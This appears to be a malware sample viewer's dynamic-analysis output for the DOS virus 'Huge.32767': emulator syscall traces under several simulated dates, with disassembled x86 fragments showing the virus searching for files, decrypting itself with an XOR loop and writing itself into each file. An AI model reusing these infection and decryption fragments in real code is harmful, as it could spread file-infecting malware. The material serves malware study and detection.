Sample viewer

vx.netlux.org/Virus.DOS.Huge.32767

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:02.508387678Z 42 PC: 12b9d | Get date 0x12b9d: cmp cx, 0x7ca
0x12ba1: jge 0x12c17
0x12ba3: jmp 0x12c64
0x12ba6: mov word ptr cs:[0x103], 0x6748
0x12bad: mov word ptr cs:[0x1d1], 0x6748
0x12bb4: mov byte ptr cs:[0x121], 0xa
0x12bba: mov byte ptr cs:[0x106], 1
0x12bc0: mov word ptr cs:[0x1c6], 0x7fff
0x12bc7: inc byte ptr cs:[0x25f]
0x12bcc: sub byte ptr cs:[0x109], 0x20
0x12bd2: mov word ptr cs:[0x10a], 0x4d4f
0x12bd9: mov si, 0x397
0x12bdc: inc si
0x12bdd: mov di, si
0x12bdf: sub di, 0x189
0x12be3: mov ah, byte ptr cs:[si]
0x12be6: dec ah
0x12be8: mov bh, byte ptr cs:[di]
2018-12-17T22:52:02.512193989Z 44 PC: 12c1b | Get time 0x12c1b: mov bh, dl
0x12c1d: mov al, 0
0x12c1f: add bh, dh
0x12c21: cmp bh, 0x7f
0x12c24: jb 0x12c2d
0x12c26: sub bh, 0x7f
0x12c29: mov al, bh
0x12c2b: mov bh, 0x7f
0x12c2d: mov byte ptr cs:[0x1c7], bh
0x12c32: add al, cl
0x12c34: add al, ch
0x12c36: mov byte ptr cs:[0x1c6], al
0x12c3a: jmp 0x12c4d
0x12c3c: nop
0x12c3d: mov byte ptr cs:[0x14d], 0x59
0x12c43: mov word ptr cs:[0x178], 0x100
0x12c4a: jmp 0x12d8a
0x12c4d: mov word ptr cs:[0x43a], 0x104
0x12c54: mov byte ptr cs:[0x43c], 0x46
0x12c5a: mov word ptr cs:[0x443], 0x438
2018-12-17T22:52:02.514780758Z 26 PC: 12ae0 | Set disk transfer address
2018-12-17T22:52:02.516095628Z 78 PC: 12aea | Find first file
2018-12-17T22:52:02.524212616Z 61 PC: 12af4 | Open file (Filename = '4')
2018-12-17T22:52:02.531646711Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-17T22:52:02.539167239Z 66 PC: 12b23 | Move file pointer
2018-12-17T22:52:02.541806686Z 44 PC: 12d2e | Get time 0x12d2e: add dl, ch
0x12d30: jmp 0x12ca4
0x12d33: nop
0x12d34: mov dl, byte ptr ds:[0x340]
0x12d39: mov byte ptr cs:[0x37e], dl
0x12d3e: inc bp
0x12d3f: mov si, 0x339
0x12d42: dec si
0x12d43: xor byte ptr ds:[si], 0
0x12d47: cmp si, 5
0x12d4a: jne 0x12d42
0x12d4c: cmp bp, 0
0x12d4f: je 0x12d74
0x12d51: xor dx, dx
0x12d53: xor cx, cx
0x12d55: xor bx, bx
0x12d57: mov ds, dx
0x12d59: xchg word ptr cs:[0x3ce], dx
0x12d5e: xchg word ptr cs:[0x3d0], cx
0x12d63: xchg word ptr cs:[0x3d2], bx
2018-12-17T22:52:02.545273399Z 64 PC: 12d71 | Write file or device (Write 23705 bytes on handle 5)
2018-12-17T22:52:02.563438112Z 62 PC: 12b3f | Close file
2018-12-17T22:52:02.573452795Z 79 PC: 12b48 | Find next file
2018-12-17T22:52:02.576806475Z 61 PC: 12af4 | Open file (Filename = 'i]ޣX(�s�K�^�y_�v]���ͷ]]��f]47)]9-3,+(;.]%700]);0:s8;)(.+9(]72]k]);9-28)]]]]]]]]s�K�^s�S�^s�C�^s�C�^�q�|]��,��c�K^s�K#^�d^c�i]ޣX(�ޠ])~l�l�l�Ӈs�K�^s�S�^s�C�^s�C�^��|�]l��࠾F.�4]��8u���1����f�8')
2018-12-17T22:52:02.584427211Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-17T22:52:02.592748914Z 66 PC: 12b23 | Move file pointer
2018-12-17T22:52:02.59455153Z 44 PC: 12d2e | Get time 0x12d2e: add dl, ch
0x12d30: jmp 0x12ca4
0x12d33: nop
0x12d34: mov dl, byte ptr ds:[0x340]
0x12d39: mov byte ptr cs:[0x37e], dl
0x12d3e: inc bp
0x12d3f: mov si, 0x339
0x12d42: dec si
0x12d43: xor byte ptr ds:[si], 0x5d
0x12d47: cmp si, 5
0x12d4a: jne 0x12d42
0x12d4c: cmp bp, 0
0x12d4f: je 0x12d74
0x12d51: xor dx, dx
0x12d53: xor cx, cx
0x12d55: xor bx, bx
0x12d57: mov ds, dx
0x12d59: xchg word ptr cs:[0x3ce], dx
0x12d5e: xchg word ptr cs:[0x3d0], cx
0x12d63: xchg word ptr cs:[0x3d2], bx
2018-12-17T22:52:02.597071113Z 64 PC: 12d71 | Write file or device (Write 23325 bytes on handle 5)
2018-12-17T22:52:02.608036682Z 62 PC: 12b3f | Close file
2018-12-17T22:52:02.617359986Z 79 PC: 12b48 | Find next file
2018-12-17T22:52:02.620515193Z 61 PC: 12af4 | Open file
2018-12-17T22:52:02.628892139Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-17T22:52:02.63549891Z 66 PC: 12b23 | Move file pointer
2018-12-17T22:52:02.636861891Z 44 PC: 12d2e | Get time 0x12d2e: add dl, ch
0x12d30: jmp 0x12ca4
0x12d33: nop
0x12d34: mov dl, byte ptr ds:[0x340]
0x12d39: mov byte ptr cs:[0x37e], dl
0x12d3e: inc bp
0x12d3f: mov si, 0x339
0x12d42: dec si
0x12d43: xor byte ptr ds:[si], 0x62
0x12d47: cmp si, 5
0x12d4a: jne 0x12d42
0x12d4c: cmp bp, 0
0x12d4f: je 0x12d74
0x12d51: xor dx, dx
0x12d53: xor cx, cx
0x12d55: xor bx, bx
0x12d57: mov ds, dx
0x12d59: xchg word ptr cs:[0x3ce], dx
0x12d5e: xchg word ptr cs:[0x3d0], cx
0x12d63: xchg word ptr cs:[0x3d2], bx
2018-12-17T22:52:02.638799931Z 64 PC: 12d71 | Write file or device (Write 23390 bytes on handle 5)
2018-12-17T22:52:02.65209683Z 62 PC: 12b3f | Close file
2018-12-17T22:52:02.661423981Z 79 PC: 12b48 | Find next file
2018-12-17T22:52:02.664506182Z 61 PC: 12af4 | Open file (Filename = 'cWԩR"�y�A�T�sU�|W��ǽWW��lW>=#W3'9&!"1$W/=::W#1:0y21#"$!3"W=8WaW#13'82#WWWWWWWWy�A�Ty�Y�Ty�I�Ty�I�T�{�vW��&��i�ATy�A)T�nTi�cWԩR"�ԪW#tf�f�f�ٍy�A�Ty�Y�Ty�I�Ty�I�T��v�Wf��ꪾF.�4W��8u���1����f�')
2018-12-17T22:52:02.672688001Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-17T22:52:02.679945154Z 66 PC: 12b23 | Move file pointer
2018-12-17T22:52:02.681918732Z 44 PC: 12d2e | Get time 0x12d2e: add dl, ch
0x12d30: jmp 0x12ca4
0x12d33: nop
0x12d34: mov dl, byte ptr ds:[0x340]
0x12d39: mov byte ptr cs:[0x37e], dl
0x12d3e: inc bp
0x12d3f: mov si, 0x339
0x12d42: dec si
0x12d43: xor byte ptr ds:[si], 0x68
0x12d47: cmp si, 5
0x12d4a: jne 0x12d42
0x12d4c: cmp bp, 0
0x12d4f: je 0x12d74
0x12d51: xor dx, dx
0x12d53: xor cx, cx
0x12d55: xor bx, bx
0x12d57: mov ds, dx
0x12d59: xchg word ptr cs:[0x3ce], dx
0x12d5e: xchg word ptr cs:[0x3d0], cx
0x12d63: xchg word ptr cs:[0x3d2], bx
2018-12-17T22:52:02.686239729Z 64 PC: 12d71 | Write file or device (Write 23327 bytes on handle 5)
2018-12-17T22:52:02.697562087Z 62 PC: 12b3f | Close file
2018-12-17T22:52:02.707557394Z 79 PC: 12b48 | Find next file
2018-12-17T22:52:02.711345821Z 61 PC: 12af4 | Open file
2018-12-17T22:52:02.71971371Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-17T22:52:02.726928123Z 66 PC: 12b23 | Move file pointer
2018-12-17T22:52:02.729462664Z 44 PC: 12d2e | Get time 0x12d2e: add dl, ch
0x12d30: jmp 0x12ca4
0x12d33: nop
0x12d34: mov dl, byte ptr ds:[0x340]
0x12d39: mov byte ptr cs:[0x37e], dl
0x12d3e: inc bp
0x12d3f: mov si, 0x339
0x12d42: dec si
0x12d43: xor byte ptr ds:[si], 0x68
0x12d47: cmp si, 5
0x12d4a: jne 0x12d42
0x12d4c: cmp bp, 0
0x12d4f: je 0x12d74
0x12d51: xor dx, dx
0x12d53: xor cx, cx
0x12d55: xor bx, bx
0x12d57: mov ds, dx
0x12d59: xchg word ptr cs:[0x3ce], dx
0x12d5e: xchg word ptr cs:[0x3d0], cx
0x12d63: xchg word ptr cs:[0x3d2], bx
2018-12-17T22:52:02.73292611Z 64 PC: 12d71 | Write file or device (Write 23327 bytes on handle 5)
2018-12-17T22:52:02.744241937Z 62 PC: 12b3f | Close file
2018-12-17T22:52:02.753424938Z 79 PC: 12b48 | Find next file
2018-12-17T22:52:02.757827919Z 61 PC: 12af4 | Open file
2018-12-17T22:52:02.765140686Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-17T22:52:02.773198362Z 66 PC: 12b23 | Move file pointer
2018-12-17T22:52:02.775720881Z 44 PC: 12d2e | Get time 0x12d2e: add dl, ch
0x12d30: jmp 0x12ca4
0x12d33: nop
0x12d34: mov dl, byte ptr ds:[0x340]
0x12d39: mov byte ptr cs:[0x37e], dl
0x12d3e: inc bp
0x12d3f: mov si, 0x339
0x12d42: dec si
0x12d43: xor byte ptr ds:[si], 0x6d
0x12d47: cmp si, 5
0x12d4a: jne 0x12d42
0x12d4c: cmp bp, 0
0x12d4f: je 0x12d74
0x12d51: xor dx, dx
0x12d53: xor cx, cx
0x12d55: xor bx, bx
0x12d57: mov ds, dx
0x12d59: xchg word ptr cs:[0x3ce], dx
0x12d5e: xchg word ptr cs:[0x3d0], cx
0x12d63: xchg word ptr cs:[0x3d2], bx
2018-12-17T22:52:02.77846209Z 64 PC: 12d71 | Write file or device (Write 23799 bytes on handle 5)
2018-12-17T22:52:02.789609571Z 62 PC: 12b3f | Close file
2018-12-17T22:52:02.800027572Z 79 PC: 12b48 | Find next file
2018-12-17T22:52:02.802996289Z 61 PC: 12af4 | Open file (Filename = '!��$T��7�"�#� !ȑܱ�!!��ycrnkni!tHKU!EQOPWTGR!YKLL!UGLFDGUTRWET!KN!!UGEQNDU!!!!!!!!�7�"�/�"�?�"�?�"� �')
2018-12-17T22:52:02.810113359Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-17T22:52:02.817275693Z 66 PC: 12b23 | Move file pointer
2018-12-17T22:52:02.819181914Z 44 PC: 12d2e | Get time 0x12d2e: add dl, ch
0x12d30: jmp 0x12ca4
0x12d33: nop
0x12d34: mov dl, byte ptr ds:[0x340]
0x12d39: mov byte ptr cs:[0x37e], dl
0x12d3e: inc bp
0x12d3f: mov si, 0x339
0x12d42: dec si
0x12d43: xor byte ptr ds:[si], 0x73
0x12d47: cmp si, 5
0x12d4a: jne 0x12d42
0x12d4c: cmp bp, 0
0x12d4f: je 0x12d74
0x12d51: xor dx, dx
0x12d53: xor cx, cx
0x12d55: xor bx, bx
0x12d57: mov ds, dx
0x12d59: xchg word ptr cs:[0x3ce], dx
0x12d5e: xchg word ptr cs:[0x3d0], cx
0x12d63: xchg word ptr cs:[0x3d2], bx
2018-12-17T22:52:02.821454624Z 64 PC: 12d71 | Write file or device (Write 23327 bytes on handle 5)
2018-12-17T22:52:02.831516656Z 62 PC: 12b3f | Close file
2018-12-17T22:52:02.84101605Z 79 PC: 12b48 | Find next file
2018-12-17T22:52:02.84378946Z 61 PC: 12af4 | Open file
2018-12-17T22:52:02.85095988Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-17T22:52:02.860865628Z 62 PC: 12b3f | Close file
2018-12-17T22:52:02.867490683Z 79 PC: 12b48 | Find next file
2018-12-17T22:52:02.870742803Z 26 PC: 12a5d | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10746,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:02.612984912Z 42 PC: 12b9d | Get date 0x12b9d: cmp cx, 0x7ca
0x12ba1: jge 0x12c17
0x12ba3: jmp 0x12c64
0x12ba6: mov word ptr cs:[0x103], 0x6748
0x12bad: mov word ptr cs:[0x1d1], 0x6748
0x12bb4: mov byte ptr cs:[0x121], 0xa
0x12bba: mov byte ptr cs:[0x106], 1
0x12bc0: mov word ptr cs:[0x1c6], 0x7fff
0x12bc7: inc byte ptr cs:[0x25f]
0x12bcc: sub byte ptr cs:[0x109], 0x20
0x12bd2: mov word ptr cs:[0x10a], 0x4d4f
0x12bd9: mov si, 0x397
0x12bdc: inc si
0x12bdd: mov di, si
0x12bdf: sub di, 0x189
0x12be3: mov ah, byte ptr cs:[si]
0x12be6: dec ah
0x12be8: mov bh, byte ptr cs:[di]
2018-12-25T12:29:02.615970949Z 26 PC: 12ae0 | Set disk transfer address
2018-12-25T12:29:02.618183064Z 78 PC: 12aea | Find first file
2018-12-25T12:29:02.629027137Z 61 PC: 12af4 | Open file (Filename = '4')
2018-12-25T12:29:02.637377877Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-25T12:29:02.644587641Z 66 PC: 12b23 | Move file pointer
2018-12-25T12:29:02.646477842Z 44 PC: 12d2e | Get time 0x12d2e: add dl, ch
0x12d30: jmp 0x12ca4
0x12d33: nop
0x12d34: mov dl, byte ptr ds:[0x340]
0x12d39: mov byte ptr cs:[0x37e], dl
0x12d3e: inc bp
0x12d3f: mov si, 0x339
0x12d42: dec si
0x12d43: xor byte ptr ds:[si], 0
0x12d47: cmp si, 5
0x12d4a: jne 0x12d42
0x12d4c: cmp bp, 0
0x12d4f: je 0x12d74
0x12d51: xor dx, dx
0x12d53: xor cx, cx
0x12d55: xor bx, bx
0x12d57: mov ds, dx
0x12d59: xchg word ptr cs:[0x3ce], dx
0x12d5e: xchg word ptr cs:[0x3d0], cx
0x12d63: xchg word ptr cs:[0x3d2], bx
2018-12-25T12:29:02.649623123Z 64 PC: 12d71 | Write file or device (Write 32985 bytes on handle 5)
2018-12-25T12:29:02.671208535Z 62 PC: 12b3f | Close file
2018-12-25T12:29:02.680016841Z 79 PC: 12b48 | Find next file
2018-12-25T12:29:02.682892913Z 61 PC: 12af4 | Open file (See above)
2018-12-25T12:29:02.690448132Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T12:29:02.698286711Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T12:29:02.699845064Z 44 PC: 12d2e | Get time (See above)
2018-12-25T12:29:02.703012756Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T12:29:02.714463496Z 62 PC: 12b3f | Close file (See above)
2018-12-25T12:29:02.723929675Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T12:29:02.727912836Z 61 PC: 12af4 | Open file (See above)
2018-12-25T12:29:02.735434226Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T12:29:02.742632994Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T12:29:02.74496956Z 44 PC: 12d2e | Get time (See above)
2018-12-25T12:29:02.747430115Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T12:29:02.758838944Z 62 PC: 12b3f | Close file (See above)
2018-12-25T12:29:02.768958925Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T12:29:02.771958853Z 61 PC: 12af4 | Open file (See above)
2018-12-25T12:29:02.779283686Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T12:29:02.786655719Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T12:29:02.78931604Z 44 PC: 12d2e | Get time (See above)
2018-12-25T12:29:02.79179076Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T12:29:02.804161913Z 62 PC: 12b3f | Close file (See above)
2018-12-25T12:29:02.814753873Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T12:29:02.817780063Z 61 PC: 12af4 | Open file (See above)
2018-12-25T12:29:02.82528809Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T12:29:02.832890048Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T12:29:02.834418182Z 44 PC: 12d2e | Get time (See above)
2018-12-25T12:29:02.836785935Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T12:29:02.849330477Z 62 PC: 12b3f | Close file (See above)
2018-12-25T12:29:02.859287208Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T12:29:02.862370577Z 61 PC: 12af4 | Open file (See above)
2018-12-25T12:29:02.871272356Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T12:29:02.87943854Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T12:29:02.881057433Z 44 PC: 12d2e | Get time (See above)
2018-12-25T12:29:02.884191312Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T12:29:02.895328306Z 62 PC: 12b3f | Close file (See above)
2018-12-25T12:29:02.904539823Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T12:29:02.907644153Z 61 PC: 12af4 | Open file (See above)
2018-12-25T12:29:02.915072508Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T12:29:02.922495035Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T12:29:02.924051991Z 44 PC: 12d2e | Get time (See above)
2018-12-25T12:29:02.926888456Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T12:29:02.938105402Z 62 PC: 12b3f | Close file (See above)
2018-12-25T12:29:02.947318691Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T12:29:02.951073246Z 61 PC: 12af4 | Open file (See above)
2018-12-25T12:29:02.958989955Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T12:29:02.96887416Z 62 PC: 12b3f | Close file (See above)
2018-12-25T12:29:02.972507737Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T12:29:02.97524038Z 26 PC: 12a5d | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1994,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10746,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:16.261666197Z 42 PC: 12b9d | Get date 0x12b9d: cmp cx, 0x7ca
0x12ba1: jge 0x12c17
0x12ba3: jmp 0x12c64
0x12ba6: mov word ptr cs:[0x103], 0x6748
0x12bad: mov word ptr cs:[0x1d1], 0x6748
0x12bb4: mov byte ptr cs:[0x121], 0xa
0x12bba: mov byte ptr cs:[0x106], 1
0x12bc0: mov word ptr cs:[0x1c6], 0x7fff
0x12bc7: inc byte ptr cs:[0x25f]
0x12bcc: sub byte ptr cs:[0x109], 0x20
0x12bd2: mov word ptr cs:[0x10a], 0x4d4f
0x12bd9: mov si, 0x397
0x12bdc: inc si
0x12bdd: mov di, si
0x12bdf: sub di, 0x189
0x12be3: mov ah, byte ptr cs:[si]
0x12be6: dec ah
0x12be8: mov bh, byte ptr cs:[di]
2018-12-25T13:07:16.265171765Z 44 PC: 12c1b | Get time 0x12c1b: mov bh, dl
0x12c1d: mov al, 0
0x12c1f: add bh, dh
0x12c21: cmp bh, 0x7f
0x12c24: jb 0x12c2d
0x12c26: sub bh, 0x7f
0x12c29: mov al, bh
0x12c2b: mov bh, 0x7f
0x12c2d: mov byte ptr cs:[0x1c7], bh
0x12c32: add al, cl
0x12c34: add al, ch
0x12c36: mov byte ptr cs:[0x1c6], al
0x12c3a: jmp 0x12c4d
0x12c3c: nop
0x12c3d: mov byte ptr cs:[0x14d], 0x59
0x12c43: mov word ptr cs:[0x178], 0x100
0x12c4a: jmp 0x12d8a
0x12c4d: mov word ptr cs:[0x43a], 0x104
0x12c54: mov byte ptr cs:[0x43c], 0x46
0x12c5a: mov word ptr cs:[0x443], 0x438
2018-12-25T13:07:16.268157497Z 26 PC: 12ae0 | Set disk transfer address
2018-12-25T13:07:16.269753674Z 78 PC: 12aea | Find first file
2018-12-25T13:07:16.278071629Z 61 PC: 12af4 | Open file (Filename = '4')
2018-12-25T13:07:16.285870303Z 63 PC: 12b05 | Read file or device (Read 65535 bytes on handle 5)
2018-12-25T13:07:16.29348566Z 66 PC: 12b23 | Move file pointer
2018-12-25T13:07:16.296285866Z 44 PC: 12d2e | Get time 0x12d2e: add dl, ch
0x12d30: jmp 0x12ca4
0x12d33: nop
0x12d34: mov dl, byte ptr ds:[0x340]
0x12d39: mov byte ptr cs:[0x37e], dl
0x12d3e: inc bp
0x12d3f: mov si, 0x339
0x12d42: dec si
0x12d43: xor byte ptr ds:[si], 0
0x12d47: cmp si, 5
0x12d4a: jne 0x12d42
0x12d4c: cmp bp, 0
0x12d4f: je 0x12d74
0x12d51: xor dx, dx
0x12d53: xor cx, cx
0x12d55: xor bx, bx
0x12d57: mov ds, dx
0x12d59: xchg word ptr cs:[0x3ce], dx
0x12d5e: xchg word ptr cs:[0x3d0], cx
0x12d63: xchg word ptr cs:[0x3d2], bx
2018-12-25T13:07:16.299290613Z 64 PC: 12d71 | Write file or device (Write 22187 bytes on handle 5)
2018-12-25T13:07:16.317254408Z 62 PC: 12b3f | Close file
2018-12-25T13:07:16.335048763Z 79 PC: 12b48 | Find next file
2018-12-25T13:07:16.338320655Z 61 PC: 12af4 | Open file (See above)
2018-12-25T13:07:16.345642105Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T13:07:16.352647537Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T13:07:16.354941513Z 44 PC: 12d2e | Get time (See above)
2018-12-25T13:07:16.357633786Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T13:07:16.367968142Z 62 PC: 12b3f | Close file (See above)
2018-12-25T13:07:16.381849839Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T13:07:16.384951767Z 61 PC: 12af4 | Open file (See above)
2018-12-25T13:07:16.394943789Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T13:07:16.403845773Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T13:07:16.405843952Z 44 PC: 12d2e | Get time (See above)
2018-12-25T13:07:16.40870314Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T13:07:16.420461706Z 62 PC: 12b3f | Close file (See above)
2018-12-25T13:07:16.429668485Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T13:07:16.43276296Z 61 PC: 12af4 | Open file (See above)
2018-12-25T13:07:16.441145106Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T13:07:16.449263735Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T13:07:16.451451785Z 44 PC: 12d2e | Get time (See above)
2018-12-25T13:07:16.456433245Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T13:07:16.471255643Z 62 PC: 12b3f | Close file (See above)
2018-12-25T13:07:16.480996138Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T13:07:16.48480063Z 61 PC: 12af4 | Open file (See above)
2018-12-25T13:07:16.496640191Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T13:07:16.504172728Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T13:07:16.506281083Z 44 PC: 12d2e | Get time (See above)
2018-12-25T13:07:16.50955693Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T13:07:16.520295687Z 62 PC: 12b3f | Close file (See above)
2018-12-25T13:07:16.529977254Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T13:07:16.534340741Z 61 PC: 12af4 | Open file (See above)
2018-12-25T13:07:16.542510472Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T13:07:16.567176025Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T13:07:16.569950028Z 44 PC: 12d2e | Get time (See above)
2018-12-25T13:07:16.572847452Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T13:07:16.58349275Z 62 PC: 12b3f | Close file (See above)
2018-12-25T13:07:16.787465489Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T13:07:16.79187544Z 61 PC: 12af4 | Open file (See above)
2018-12-25T13:07:16.799867631Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T13:07:16.808799989Z 66 PC: 12b23 | Move file pointer (See above)
2018-12-25T13:07:16.811572208Z 44 PC: 12d2e | Get time (See above)
2018-12-25T13:07:16.814408264Z 64 PC: 12d71 | Write file or device (See above)
2018-12-25T13:07:16.931997148Z 62 PC: 12b3f | Close file (See above)
2018-12-25T13:07:16.942284538Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T13:07:16.945470932Z 61 PC: 12af4 | Open file (See above)
2018-12-25T13:07:16.953559246Z 63 PC: 12b05 | Read file or device (See above)
2018-12-25T13:07:16.963603489Z 62 PC: 12b3f | Close file (See above)
2018-12-25T13:07:16.965601046Z 79 PC: 12b48 | Find next file (See above)
2018-12-25T13:07:16.968311903Z 26 PC: 12a5d | Set disk transfer address